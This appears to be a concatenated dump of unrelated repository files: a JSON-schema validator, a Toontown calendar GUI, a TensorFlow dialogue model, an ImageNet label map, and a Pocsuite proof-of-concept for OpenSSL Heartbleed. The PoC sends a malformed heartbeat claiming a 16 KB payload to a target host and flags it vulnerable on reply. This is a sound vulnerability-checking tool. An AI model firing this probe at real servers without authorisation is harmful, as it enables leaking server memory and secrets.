},
"type": "object"
},
"datesRangeException": {
"properties": {
"endDate": {
"type": "string"
},
"startDate": {
"type": "string"
}
},
"type": "object"
},
"description":
{
"type": "string"
},
"dictionaryName": {
"type": "string"
},
"dictionaryValue": {
"type": "string"
},
"hoursRange": {
"properties": {
"endTime": {
"type": "string"
},
"startTime": {
"type": "string"
}
},
"type": "object"
},
"hoursRangeException": {
"properties": {
"endTime": {
"type": "string"
},
"startTime": {
"type": "string"
}
},
"type": "object"
},
"id": {
"type": "string"
},
"isNegate": {
"type": "boolean"
},
"link": {
"properties": {
"href": {
"type": "string"
},
"rel": {
"enum": [
"next",
"previous",
"self",
"status"
],
"type": "string"
},
"type": {
"type": "string"
}
},
"type": "object"
},
"name": {
"type": "string"
},
"operator": {
"enum": [
"contains",
"endsWith",
"equals",
"greaterOrEquals",
"greaterThan",
"in",
"ipEquals",
"ipGreaterThan",
"ipLessThan",
"ipNotEquals",
"lessOrEquals",
"lessThan",
"matches",
"notContains",
"notEndsWith",
"notEquals",
"notIn",
"notStartsWith",
"startsWith"
],
"type": "string"
},
"weekDays": {
"items": {
"enum": [
"Friday",
"Monday",
"Saturday",
"Sunday",
"Thursday",
"Tuesday",
"Wednesday"
],
"type": "string"
},
"type": "array"
},
"weekDaysException": {
"items": {
"enum": [
"Friday",
"Monday",
"Saturday",
"Sunday",
"Thursday",
"Tuesday",
"Wednesday"
],
"type": "string"
},
"type": "array"
}
},
"type": "object"
},
"type": "array"
},
"version": {
"type": "string"
}
},
"required": [
"response",
"version"
],
"type": "object"
}'''.replace("\n" + ' ' * 16, '')
))
def validate(self, request):
try:
self._validator(request)
except fastjsonschema.exceptions.JsonSchemaException as e:
raise MalformedRequest(
'{} is invalid. Reason: {}'.format(request, e.message)
)
|
[
"bvargas@altus.cr"
] |
bvargas@altus.cr
|
e1b200a25da813398431400b47064af2a8e368d4
|
8e69eee9b474587925e22413717eb82e4b024360
|
/v2.5.7/toontown/parties/CalendarGuiMonth.py
|
1fb599e6de7003a2926a7423453b5db44280d3e1
|
[
"MIT"
] |
permissive
|
TTOFFLINE-LEAK/ttoffline
|
afaef613c36dc3b70514ccee7030ba73c3b5045b
|
bb0e91704a755d34983e94288d50288e46b68380
|
refs/heads/master
| 2020-06-12T15:41:59.411795
| 2020-04-17T08:22:55
| 2020-04-17T08:22:55
| 194,348,185
| 5
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,713
|
py
|
import calendar
from datetime import timedelta, datetime
from panda3d.core import Vec4, TextNode
from direct.gui.DirectGui import DirectFrame, DirectLabel, DirectButton, DirectScrolledList, DGG
from toontown.toonbase import TTLocalizer
from toontown.toonbase import ToontownGlobals
from toontown.parties.CalendarGuiDay import CalendarGuiDay
class CalendarGuiMonth(DirectFrame):
notify = directNotify.newCategory('CalendarGuiMonth')
def __init__(self, parent, startingDateTime, scale=1.0, pos=(0, 0, -0.1), dayClickCallback=None, onlyFutureDaysClickable=False, onlyFutureMonthsClickable=False):
self.startDate = startingDateTime
self.curDate = startingDateTime
self.dayClickCallback = dayClickCallback
self.onlyFutureDaysClickable = onlyFutureDaysClickable
self.onlyFutureMonthsClickable = onlyFutureMonthsClickable
if self.onlyFutureDaysClickable:
self.onlyFutureMonthsClickable = True
DirectFrame.__init__(self, parent=parent, scale=scale, pos=pos)
self.showMarkers = config.GetBool('show-calendar-markers', 0)
self.load()
self.createGuiObjects()
self.lastSelectedDate = None
self.accept('clickedOnDay', self.clickedOnDay)
return
def createDummyLocators(self):
self.monthLocator = self.attachNewNode('monthLocator')
self.monthLocator.setZ(0.6)
self.weekDayLocators = []
for i in xrange(7):
self.weekDayLocators.append(self.attachNewNode('weekDayLocator-%d' % i))
self.weekDayLocators[i].setZ(0.5)
self.weekDayLocators[i].setX(i * 0.24 + -0.75)
dayTopLeftX = -0.8
dayTopLeftZ = 0.4
self.dayLocators = []
for row in xrange(6):
oneWeek = []
for col in xrange(7):
newDayLoc = self.attachNewNode('dayLocator-row-%d-col-%d' % (row, col))
newDayLoc.setX(col * 0.24 + dayTopLeftX)
newDayLoc.setZ(row * -0.18 + dayTopLeftZ)
oneWeek.append(newDayLoc)
self.dayLocators.append(oneWeek)
self.monthLeftLocator = self.attachNewNode('monthLeft')
self.monthLeftLocator.setPos(-0.3, 0, 0.65)
self.monthRightLocator = self.attachNewNode('monthRight')
self.monthRightLocator.setPos(0.3, 0, 0.65)
def attachMarker(self, parent, scale=0.01, color=(1, 0, 0)):
if self.showMarkers:
marker = loader.loadModel('phase_3/models/misc/sphere')
marker.reparentTo(parent)
marker.setScale(scale)
marker.setColor(*color)
def load(self):
if base.cr.newsManager.isHolidayRunning(ToontownGlobals.ORANGES):
self.monthLabel = DirectLabel(parent=self, relief=None, text='IT IS MARCH 32', text_scale=0.075, text_font=ToontownGlobals.getSuitFont(), text_fg=(40 / 255.0,
140 / 255.0,
246 / 255.0,
1.0))
else:
monthAsset = loader.loadModel('phase_4/models/parties/tt_m_gui_sbk_calendar')
monthAsset.reparentTo(self)
self.monthLocator = self.find('**/locator_month/locator_month')
self.attachMarker(self.monthLocator)
self.weekDayLocators = []
for weekday in ('sun', 'mon', 'tue', 'wed', 'thu', 'fri', 'sat'):
weekDayLoc = self.find('**/loc_%s' % weekday)
self.weekDayLocators.append(weekDayLoc)
self.attachMarker(weekDayLoc)
self.dayLocators = []
for row in xrange(6):
oneWeek = []
for col in xrange(7):
newDayLoc = self.find('**/loc_box_%s_%s' % (row, col))
oneWeek.append(newDayLoc)
self.dayLocators.append(oneWeek)
self.monthLeftLocator = self.find('**/locator_month_arrowL')
self.monthRightLocator = self.find('**/locator_month_arrowR')
self.filterLocator = self.find('**/locator_filter')
self.filterLocatorArrowUp = self.find('**/locator_filter_arrowTop')
self.filterLocatorArrowDown = self.find('**/locator_filter_arrowBottom')
self.yearLocator = self.attachNewNode('yearLocator')
self.yearLocator.setPos(self.monthLocator, 0, 0, -0.03)
return
def createGuiObjects(self):
if base.cr.newsManager.isHolidayRunning(ToontownGlobals.ORANGES):
return
self.monthLabel = DirectLabel(parent=self.monthLocator, relief=None, text=TTLocalizer.Months[self.startDate.month], text_scale=0.075, text_font=ToontownGlobals.getMinnieFont(), text_fg=(40 / 255.0,
140 / 255.0,
246 / 255.0,
1.0))
self.yearLabel = DirectLabel(parent=self.yearLocator, relief=None, text=str(self.startDate.year), text_scale=0.03, text_font=ToontownGlobals.getMinnieFont(), text_fg=(140 / 255.0,
140 / 255.0,
246 / 255.0,
1.0))
self.weekdayLabels = []
for posIndex in xrange(7):
adjustedNameIndex = (posIndex - 1) % 7
self.weekdayLabels.append(DirectLabel(parent=self.weekDayLocators[posIndex], relief=None, text=TTLocalizer.DayNamesAbbrev[adjustedNameIndex], text_font=ToontownGlobals.getInterfaceFont(), text_fg=(255 / 255.0,
146 / 255.0,
113 / 255.0,
1.0), text_scale=0.05))
self.createGuiDays()
arrowUp = self.find('**/month_arrowR_up')
arrowDown = self.find('**/month_arrowR_down')
arrowHover = self.find('**/month_arrowR_hover')
self.monthLeftArrow = DirectButton(parent=self.monthLeftLocator, relief=None, image=(arrowUp,
arrowDown,
arrowHover,
arrowUp), image3_color=Vec4(1, 1, 1, 0.5), scale=(-1.0, 1.0, 1.0), command=self.__doMonthLeft)
if self.onlyFutureMonthsClickable:
self.monthLeftArrow.hide()
self.monthRightArrow = DirectButton(parent=self.monthRightLocator, relief=None, image=(arrowUp,
arrowDown,
arrowHover,
arrowUp), image3_color=Vec4(1, 1, 1, 0.5), command=self.__doMonthRight)
def makeLabel(itemName, itemNum, *extraArgs):
return DirectLabel(text=itemName, frameColor=(0, 0, 0, 0), text_scale=0.04)
gui = loader.loadModel('phase_4/models/parties/tt_m_gui_sbk_calendar_box')
arrowUp = gui.find('**/downScroll_up')
arrowDown = gui.find('**/downScroll_down')
arrowHover = gui.find('**/downScroll_hover')
filterLocatorUpPos = self.filterLocatorArrowUp.getPos(self.filterLocator)
filterLocatorDownPos = self.filterLocatorArrowDown.getPos(self.filterLocator)
self.filterList = DirectScrolledList(parent=self.filterLocator, relief=None, pos=(0,
0,
0), image=None, text_scale=0.025, incButton_image=(arrowUp,
arrowDown,
arrowHover,
arrowUp), incButton_relief=None, incButton_pos=filterLocatorDownPos, incButton_image3_color=Vec4(1, 1, 1, 0.2), incButtonCallback=self.filterChanged, decButton_image=(arrowUp,
arrowDown,
arrowHover,
arrowUp), decButton_relief=None, decButton_pos=filterLocatorUpPos, decButton_scale=(1,
1,
-1), decButton_image3_color=Vec4(1, 1, 1, 0.2), decButtonCallback=self.filterChanged, numItemsVisible=1, itemMakeFunction=makeLabel, items=[TTLocalizer.CalendarShowAll, TTLocalizer.CalendarShowOnlyHolidays, TTLocalizer.CalendarShowOnlyParties], itemFrame_frameSize=(-0.2,
0.2,
-0.02,
0.05), itemFrame_frameColor=(0,
0,
0,
0))
gui.removeNode()
return
def getTopLeftDate(self):
firstOfTheMonth = self.curDate.replace(day=1)
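        # weekday() is 0 for Monday .. 6 for Sunday, so this counts the days
        # back to the most recent Sunday, which fills the calendar's top-left cell.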
daysAwayFromSunday = (firstOfTheMonth.weekday() - 6) % 7
topLeftDate = firstOfTheMonth + timedelta(days=-daysAwayFromSunday)
return topLeftDate
def createGuiDays(self):
topLeftDate = self.getTopLeftDate()
curDate = topLeftDate
self.guiDays = []
for row in self.dayLocators:
for oneLocator in row:
self.guiDays.append(CalendarGuiDay(oneLocator, curDate, self.curDate, self.dayClickCallback, self.onlyFutureDaysClickable))
curDate += timedelta(days=1)
def changeDateForGuiDays(self):
topLeftDate = self.getTopLeftDate()
guiDayDate = topLeftDate
for guiDay in self.guiDays:
guiDay.changeDate(self.curDate, guiDayDate)
guiDayDate += timedelta(days=1)
def changeMonth(self, monthChange):
if hasattr(base, 'cr') and base.cr.newsManager.isHolidayRunning(ToontownGlobals.ORANGES):
return
if monthChange != 0:
newMonth = self.curDate.month + monthChange
newYear = self.curDate.year
while newMonth > 12:
newYear += 1
newMonth -= 12
while newMonth < 1:
if newYear - 1 > 1899:
newMonth += 12
newYear -= 1
else:
newMonth += 1
self.curDate = datetime(newYear, newMonth, 1, self.curDate.time().hour, self.curDate.time().minute, self.curDate.time().second, self.curDate.time().microsecond, self.curDate.tzinfo)
self.monthLabel['text'] = (
TTLocalizer.Months[self.curDate.month],)
self.yearLabel['text'] = (str(self.curDate.year),)
startTime = globalClock.getRealTime()
self.changeDateForGuiDays()
endTime = globalClock.getRealTime()
self.notify.debug('changeDate took %f seconds' % (endTime - startTime))
self.updateSelectedDate()
if monthChange != 0:
if self.onlyFutureMonthsClickable and newMonth == self.startDate.month and newYear == self.startDate.year:
self.monthLeftArrow.hide()
def __doMonthLeft(self):
self.changeMonth(-1)
def __doMonthRight(self):
self.monthLeftArrow.show()
self.changeMonth(1)
def destroy(self):
self.ignoreAll()
try:
self.dayClickCallback = None
self.monthLeftArrow.destroy()
self.monthRightArrow.destroy()
for day in self.guiDays:
if day is not None:
day.destroy()
day = None
self.filterList.destroy()
except:
pass
DirectFrame.destroy(self)
return
def clickedOnDay(self, dayDate):
self.lastSelectedDate = dayDate
self.updateSelectedDate()
def updateSelectedDate(self):
if self.lastSelectedDate:
for oneGuiDay in self.guiDays:
if oneGuiDay.myDate.date() == self.lastSelectedDate:
oneGuiDay.updateSelected(True)
else:
oneGuiDay.updateSelected(False)
def clearSelectedDay(self):
for oneGuiDay in self.guiDays:
oneGuiDay.updateSelected(False)
def filterChanged(self):
newFilter = self.filterList.getSelectedIndex()
for guiDay in self.guiDays:
guiDay.changeFilter(newFilter)
|
[
"s0mberdemise@protonmail.com"
] |
s0mberdemise@protonmail.com
|
dd946e558805e70e2ba90c922d602e5869cd007a
|
7c0dd68e474c345d022b9d879a31cc82e0b438cf
|
/openssl_heartbleed.py
|
75e7fc2cafa0424e450d6970247f51e9629ac53e
|
[] |
no_license
|
liyanghack/-
|
8de6e2be931faea680b9c1f8e35a2a0c8cd5bc3a
|
9abab66543e19a4b444a79f2ee790b1eafaacc01
|
refs/heads/master
| 2021-02-22T04:40:08.921551
| 2020-03-13T11:10:13
| 2020-03-13T11:10:13
| 245,369,458
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,072
|
py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from pocsuite.api.poc import Output, POCBase
from pocsuite.api.poc import register
from pocsuite.thirdparty.guanxing import parse_ip_port
import struct
import socket
import time
import select
socket.setdefaulttimeout(5)
def request2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
client_key_exchange = request2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
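
# Note: despite the variable name, the bytes above are a TLS 1.1 ClientHello
# (record type 0x16 handshake, handshake type 0x01), not a client key
# exchange message.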
malformed_heartbeat = request2bin('''
18 03 02 00 03
01 40 00
''')
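
# The record header above is 0x18 (heartbeat), version 0x0302 (TLS 1.1),
# length 3; the payload declares a heartbeat request (0x01) with a claimed
# payload length of 0x4000 (16384) bytes but carries no actual payload, so a
# vulnerable server echoes back up to 16 KB of its own process memory.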
def get_msg_from_socket(some_socket, msg_length, time_out=5):
end_time = time.time() + time_out
received_data = ''
remaining_msg = msg_length
while remaining_msg > 0:
read_time = end_time - time.time()
if read_time < 0:
return None
read_socket, write_socket, error_socket = select.select([some_socket], [], [], time_out)
if some_socket in read_socket:
data = some_socket.recv(remaining_msg)
if not data:
return None
else:
received_data += data
remaining_msg -= len(data)
else:
pass
return received_data
def recv_msg(a_socket):
header = get_msg_from_socket(a_socket, 5)
if header is None:
return None, None, None
message_type, message_version, message_length = struct.unpack('>BHH', header)
message_payload = get_msg_from_socket(a_socket, message_length, 10)
if message_payload is None:
return None, None, None
return message_type, message_version, message_payload
def send_n_catch_heartbeat(our_socket):
our_socket.send(malformed_heartbeat)
while True:
content_type, content_version, content_payload = recv_msg(our_socket)
if content_type is None:
return False
        if content_type == 24:  # a heartbeat response came back -> vulnerable
            return True
        if content_type == 21:  # alert record -> the server rejected the request
            return False
def main(rhost):
global port
ip,port = parse_ip_port(rhost)
    # Fall back to the default HTTPS port when none was given
    if not port:
        port = 443
local_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
local_socket.connect((ip, int(port)))
local_socket.send(client_key_exchange)
while True:
type, version, payload = recv_msg(local_socket)
if not type:
return
        if type == 22 and ord(payload[0]) == 0x0E:  # handshake record ending with ServerHelloDone
break
local_socket.send(malformed_heartbeat)
return send_n_catch_heartbeat(local_socket)
class TestPOC(POCBase):
vulID = 'DSO-00046'
version = ''
author = 'ly'
vulDate = '2014-04-08'
createDate = '2020-03-09'
updateDate = '2020-03-13'
references = ['https://zh.wikipedia.org/wiki/%E5%BF%83%E8%84%8F%E5%87%BA%E8%A1%80%E6%BC%8F%E6%B4%9E']
name = 'Openssl 1.0.1 内存读取 信息泄露漏洞'
appPowerLink = ''
appName = 'OpenSSL'
appVersion = '1.0.1~1.0.1f, 1.0.2-beta, 1.0.2-beta1'
vulType = 'info-disclosure'
    # Vulnerability description
    desc = '''
    Known as the "Heartbleed" bug, this serious flaw (CVE-2014-0160) stems from a missing bounds check before a memcpy() call that uses victim-supplied input as its length argument. An attacker can probe the 64 KB buffers allocated by OpenSSL, have more bytes than necessary copied into them, and then read the buffer contents back, thereby obtaining user data.
    '''
    # sample sites to examine
samples = ['']
install_requires = ['']
cveID = 'CVE-2014-0160'
severity = 'high'
    solution = '''
    Fixing this vulnerability takes more than installing the patched software (the OpenSSL shared libraries and any binaries statically linked against OpenSSL). Applications that depend on OpenSSL keep running the flawed code already loaded in memory until they are restarted; only then is the hole closed.
    Moreover, even after the bug itself is fixed, a system exposed to it may still be compromised in confidentiality and even integrity. To regain confidentiality and trust, servers must regenerate all affected private/public key pairs and revoke and replace every related certificate. In general, all affected credentials (such as passwords) should be replaced, because it is hard to confirm whether a vulnerable system was actually attacked.
    '''
taskType = 'app-vul'
def _verify(self):
# print self.url
response = main(self.url)
# print response
return self.parse_attack(response)
def _attack(self):
return self._verify()
def parse_attack(self, response):
output = Output(self)
result = {}
if response:
result['VerifyInfo'] = {}
result['VerifyInfo']['URL'] = '%s' % self.url
result['VerifyInfo']['port'] = port
output.success(result)
else:
output.fail('Failed')
return output
register(TestPOC)
|
[
"noreply@github.com"
] |
liyanghack.noreply@github.com
|
2138e45b6ad500c213d7da873af0a2b31989b382
|
eb3395ce39347c6a19821ff9ab224b288f8e83fb
|
/ndm/model_cnn12_bn_att_a_w2targs.py
|
1d7eb52ddb18d34dd3b8b8a9f23e835fb5172ebc
|
[
"Apache-2.0"
] |
permissive
|
oplatek/ndm
|
86e06ac9dc62ff45f5c3ad35b6892d23650f614d
|
d32bd9d685902d9da52b7e7abd286fb5d9c7274a
|
refs/heads/master
| 2021-07-11T02:22:16.570947
| 2016-02-18T11:21:03
| 2016-02-18T11:21:03
| 52,531,623
| 0
| 0
| null | 2016-02-25T14:35:47
| 2016-02-25T14:35:47
| null |
UTF-8
|
Python
| false
| false
| 14,624
|
py
|
#!/usr/bin/env python3
import sys
import tensorflow as tf
from model import ModelW2T, ModelW2TArgs
from tfx.bricks import embedding, dense_to_one_hot, linear, conv2d, multicolumn_embedding, \
glorot_mul, reduce_max, dropout, conv2d_bn, batch_norm_lin, pow_1, softmax_2d
class Model(ModelW2TArgs):
def __init__(self, data, FLAGS):
super(Model, self).__init__(data, FLAGS)
database_column_embedding_size = 8
n_database_columns = len(data.database_columns)
conv_mul = 2
histories_embedding_size = 16
histories_vocabulary_length = len(data.idx2word_history)
history_length = data.train_set['histories'].shape[1]
histories_arguments_embedding_size = 8
histories_arguments_vocabulary_length = len(data.idx2word_history_arguments)
n_histories_arguments = data.train_set['histories_arguments'].shape[1]
action_templates_vocabulary_length = len(data.idx2word_action_template)
action_templates_embedding_size = 8
num_actions_arguments = data.batch_actions_arguments.shape[2]
actions_arguments_vocabulary_length = len(data.idx2word_action_arguments)
with tf.name_scope('data'):
database = tf.Variable(data.database, name='database',
trainable=False)
batch_histories = tf.Variable(data.batch_histories, name='histories',
trainable=False)
batch_histories_arguments = tf.Variable(data.batch_histories_arguments, name='histories_arguments',
trainable=False)
batch_actions_template = tf.Variable(data.batch_actions_template, name='actions',
trainable=False)
batch_action_arguments = tf.Variable(data.batch_actions_arguments, name='actions_arguments',
trainable=False)
histories = tf.gather(batch_histories, self.batch_idx)
histories_arguments = tf.gather(batch_histories_arguments, self.batch_idx)
actions_template = tf.gather(batch_actions_template, self.batch_idx)
actions_arguments = tf.gather(batch_action_arguments, self.batch_idx)
with tf.name_scope('model'):
database_embedding = multicolumn_embedding(
columns=database,
lengths=[len(i2w) for i2w in [data.database_idx2word[column] for column in data.database_columns]],
sizes=[database_column_embedding_size for column in data.database_columns],
# all columns have the same size
name='database_embedding'
)
histories_embedding = embedding(
input=histories,
length=histories_vocabulary_length,
size=histories_embedding_size,
name='histories_embedding'
)
histories_arguments_embedding = embedding(
input=histories_arguments,
length=histories_arguments_vocabulary_length,
size=histories_arguments_embedding_size,
name='histories_arguments_embedding'
)
with tf.name_scope("UtterancesEncoder"):
conv3 = histories_embedding
# conv3 = dropout(conv3, pow_1(self.dropout_keep_prob, 2))
conv3 = conv2d_bn(
input=conv3,
filter=[1, 3, conv3.size, conv3.size * conv_mul],
phase_train=self.phase_train,
name='conv_utt_size_3_layer_1'
)
encoded_utterances = reduce_max(conv3, [2], keep_dims=True, name='encoded_utterances')
with tf.name_scope("HistoryEncoder"):
conv3 = encoded_utterances
conv3 = dropout(conv3, pow_1(self.dropout_keep_prob, 2))
conv3 = conv2d_bn(
input=conv3,
filter=[3, 1, conv3.size, conv3.size * conv_mul],
phase_train=self.phase_train,
name='conv_hist_size_3_layer_1'
)
conv3 = dropout(conv3, pow_1(self.dropout_keep_prob, 2))
conv3 = conv2d_bn(
input=conv3,
filter=[3, 1, conv3.size, conv3.size * conv_mul],
phase_train=self.phase_train,
name='conv_hist_size_3_layer_2'
)
encoded_history = reduce_max(conv3, [1, 2], name='encoded_history')
# print(encoded_history)
with tf.name_scope("DatabaseAttention"):
histories_arguments_embedding = tf.reshape(
histories_arguments_embedding,
[-1, n_histories_arguments * histories_arguments_embedding_size],
name='histories_arguments_embedding'
)
# print(histories_arguments_embedding)
history_predicate = tf.concat(
1,
[encoded_history, histories_arguments_embedding],
name='history_predicate'
)
# print(history_predicate)
att_W_nx = conv3.size + n_histories_arguments * histories_arguments_embedding_size
att_W_ny = n_database_columns * database_column_embedding_size
att_W = tf.get_variable(
name='attention_W',
shape=[att_W_nx, att_W_ny],
initializer=tf.random_uniform_initializer(
-glorot_mul(att_W_nx, att_W_ny),
glorot_mul(att_W_nx, att_W_ny)
),
)
hp_x_att_W = tf.matmul(history_predicate, att_W)
attention_scores = tf.matmul(hp_x_att_W, database_embedding, transpose_b=True)
attention = tf.nn.softmax(attention_scores, name="attention_softmax")
print(attention)
attention_max = tf.reduce_max(attention, reduction_indices=1, keep_dims=True)
attention_min = tf.reduce_min(attention, reduction_indices=1, keep_dims=True)
attention_mean = tf.reduce_mean(attention_scores, reduction_indices=1, keep_dims=True)
attention_feat = tf.concat(1, [attention_max, attention_mean, attention_min], name='attention_feat')
attention_feat_size = 3
# print(attention_feat)
db_result = tf.matmul(attention, database_embedding, name='db_result')
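                # db_result above is the attention-weighted average of the
                # database row embeddings, i.e. a soft database lookup
                # conditioned on the dialogue history and its arguments.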
db_result_size = att_W_ny
# print(db_result)
with tf.name_scope("Decoder"):
second_to_last_user_utterance = encoded_utterances[:, history_length - 3, 0, :]
last_system_utterance = encoded_utterances[:, history_length - 2, 0, :]
last_user_utterance = encoded_utterances[:, history_length - 1, 0, :]
dialogue_state = tf.concat(
1,
[
encoded_history,
last_user_utterance,
last_system_utterance,
second_to_last_user_utterance,
attention_feat,
db_result
],
name='dialogue_state'
)
dialogue_state_size = (
conv3.size +
3 * histories_embedding_size * conv_mul +
attention_feat_size +
db_result_size +
0
)
dialogue_state = tf.nn.relu(dialogue_state)
dialogue_state = dropout(dialogue_state, self.dropout_keep_prob)
# action prediction
projection = linear(
input=dialogue_state,
input_size=dialogue_state_size,
output_size=dialogue_state_size,
name='linear_projection_1'
)
projection = batch_norm_lin(projection, dialogue_state_size, self.phase_train,
name='linear_projection_1_bn')
activation = tf.nn.relu(projection)
activation = dropout(activation, self.dropout_keep_prob)
projection = linear(
input=activation,
input_size=dialogue_state_size,
output_size=dialogue_state_size,
name='linear_projection_2'
)
projection = batch_norm_lin(projection, dialogue_state_size, self.phase_train,
name='linear_projection_2_bn')
activation = tf.nn.relu(projection)
activation = dropout(activation, self.dropout_keep_prob)
projection = linear(
input=activation,
input_size=dialogue_state_size,
output_size=action_templates_vocabulary_length,
name='linear_projection_3_predictions_action'
)
self.predictions_action = tf.nn.softmax(projection, name="softmax_output_prediction_action")
# argument prediction
                # first encode the decoded action template and the true action template
choice = tf.floor(tf.random_uniform([1], self.use_inputs_prob, 1 + self.use_inputs_prob, tf.float32))
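                # floor(uniform(p, 1 + p)) above equals 1 with probability p
                # and 0 otherwise, i.e. a Bernoulli(use_inputs_prob) coin that
                # mixes the ground-truth template with the model's own
                # prediction (scheduled sampling).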
prediction_action_argmax = tf.stop_gradient(tf.argmax(self.predictions_action, 1))
predicted_action_templates_embedding = embedding(
input=prediction_action_argmax,
length=action_templates_vocabulary_length,
size=action_templates_embedding_size,
name='action_templates_embedding'
)
true_action_template_embedding = tf.gather(predicted_action_templates_embedding.embedding_table, actions_template)
predicted_action_templates_embedding = tf.stop_gradient(predicted_action_templates_embedding)
action_templates_embedding = choice * true_action_template_embedding + (1.0 - choice) * predicted_action_templates_embedding
dialogue_state_action_template = tf.concat(
1,
[
dialogue_state,
action_templates_embedding
],
name='dialogue_state_action_template'
)
dialogue_state_action_template_size = (
dialogue_state_size +
action_templates_embedding_size
)
# condition on the dialogue state and the decoded template
projection = linear(
input=dialogue_state_action_template,
input_size=dialogue_state_action_template_size,
output_size=dialogue_state_action_template_size,
name='linear_projection_1_predictions_arguments'
)
projection = batch_norm_lin(projection, dialogue_state_action_template_size, self.phase_train,
name='linear_projection_1_predictions_arguments_bn')
activation = tf.nn.relu(projection)
activation = dropout(activation, self.dropout_keep_prob)
projection = linear(
input=activation,
input_size=dialogue_state_action_template_size,
output_size=dialogue_state_action_template_size,
name='linear_projection_2_predictions_arguments'
)
projection = batch_norm_lin(projection, dialogue_state_action_template_size, self.phase_train,
name='linear_projection_2_predictions_arguments_bn')
activation = tf.nn.relu(projection)
activation = dropout(activation, self.dropout_keep_prob)
projection = linear(
input=activation,
input_size=dialogue_state_action_template_size,
output_size=num_actions_arguments * actions_arguments_vocabulary_length,
name='linear_projection_3_predictions_arguments'
)
self.predictions_arguments = softmax_2d(
input=projection,
n_classifiers=num_actions_arguments,
n_classes=actions_arguments_vocabulary_length,
name="softmax_2d_predictions_arguments")
if FLAGS.print_variables:
for v in tf.trainable_variables():
print(v.name)
with tf.name_scope('loss'):
one_hot_labels_action = dense_to_one_hot(actions_template, action_templates_vocabulary_length)
one_hot_labels_arguments = dense_to_one_hot(actions_arguments, actions_arguments_vocabulary_length)
loss_action = tf.reduce_mean(
- one_hot_labels_action * tf.log(tf.clip_by_value(self.predictions_action, 1e-10, 1.0)),
name='loss'
)
loss_arguments = tf.reduce_mean(
- one_hot_labels_arguments * tf.log(tf.clip_by_value(self.predictions_arguments, 1e-10, 1.0)),
name='loss'
)
self.loss = (loss_action + loss_arguments)/2
tf.scalar_summary('loss', self.loss)
with tf.name_scope('accuracy'):
correct_prediction_action = tf.equal(
tf.argmax(one_hot_labels_action, 1),
tf.argmax(self.predictions_action, 1)
)
self.accuracy_action = tf.reduce_mean(tf.cast(correct_prediction_action, 'float'))
tf.scalar_summary('accuracy_action', self.accuracy_action)
correct_prediction_arguments = tf.equal(tf.argmax(one_hot_labels_arguments, 2),
tf.argmax(self.predictions_arguments, 2))
self.accuracy_arguments = tf.reduce_mean(tf.cast(correct_prediction_arguments, 'float'))
tf.scalar_summary('accuracy_arguments', self.accuracy_arguments)
self.accuracy = (self.accuracy_action + self.accuracy_arguments)/2
tf.scalar_summary('accuracy', self.accuracy)
|
[
"filip.juricicek@gmail.com"
] |
filip.juricicek@gmail.com
|
6b94ccf36b537b20b948dc0a0e5c41ed19240a20
|
b7a9307465e4107356a9bc518a5b6eea6491ffab
|
/Model_Training/Manual_model/vgg_labels.py
|
5268dfb8bf8c2ca81ff307a268a255abe5e28a9e
|
[] |
no_license
|
Tunoc/pythonexam
|
b2378835b5bcbbf1f892b6838cfc0cc856bcb7b1
|
d7a28874edfaa23396ddfdbd77bce9c7fcfa240f
|
refs/heads/main
| 2023-02-04T05:12:52.697491
| 2020-12-27T19:27:06
| 2020-12-27T19:27:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 30,578
|
py
|
translate = {
0: 'tench, Tinca tinca',
1: 'goldfish, Carassius auratus',
2: 'great white shark, white shark, man-eater, man-eating shark, Carcharodon carcharias',
3: 'tiger shark, Galeocerdo cuvieri',
4: 'hammerhead, hammerhead shark',
5: 'electric ray, crampfish, numbfish, torpedo',
6: 'stingray',
7: 'cock',
8: 'hen',
9: 'ostrich, Struthio camelus',
10: 'brambling, Fringilla montifringilla',
11: 'goldfinch, Carduelis carduelis',
12: 'house finch, linnet, Carpodacus mexicanus',
13: 'junco, snowbird',
14: 'indigo bunting, indigo finch, indigo bird, Passerina cyanea',
15: 'robin, American robin, Turdus migratorius',
16: 'bulbul',
17: 'jay',
18: 'magpie',
19: 'chickadee',
20: 'water ouzel, dipper',
21: 'kite',
22: 'bald eagle, American eagle, Haliaeetus leucocephalus',
23: 'vulture',
24: 'great grey owl, great gray owl, Strix nebulosa',
25: 'European fire salamander, Salamandra salamandra',
26: 'common newt, Triturus vulgaris',
27: 'eft',
28: 'spotted salamander, Ambystoma maculatum',
29: 'axolotl, mud puppy, Ambystoma mexicanum',
30: 'bullfrog, Rana catesbeiana',
31: 'tree frog, tree-frog',
32: 'tailed frog, bell toad, ribbed toad, tailed toad, Ascaphus trui',
33: 'loggerhead, loggerhead turtle, Caretta caretta',
34: 'leatherback turtle, leatherback, leathery turtle, Dermochelys coriacea',
35: 'mud turtle',
36: 'terrapin',
37: 'box turtle, box tortoise',
38: 'banded gecko',
39: 'common iguana, iguana, Iguana iguana',
40: 'American chameleon, anole, Anolis carolinensis',
41: 'whiptail, whiptail lizard',
42: 'agama',
43: 'frilled lizard, Chlamydosaurus kingi',
44: 'alligator lizard',
45: 'Gila monster, Heloderma suspectum',
46: 'green lizard, Lacerta viridis',
47: 'African chameleon, Chamaeleo chamaeleon',
48: 'Komodo dragon, Komodo lizard, dragon lizard, giant lizard, Varanus komodoensis',
49: 'African crocodile, Nile crocodile, Crocodylus niloticus',
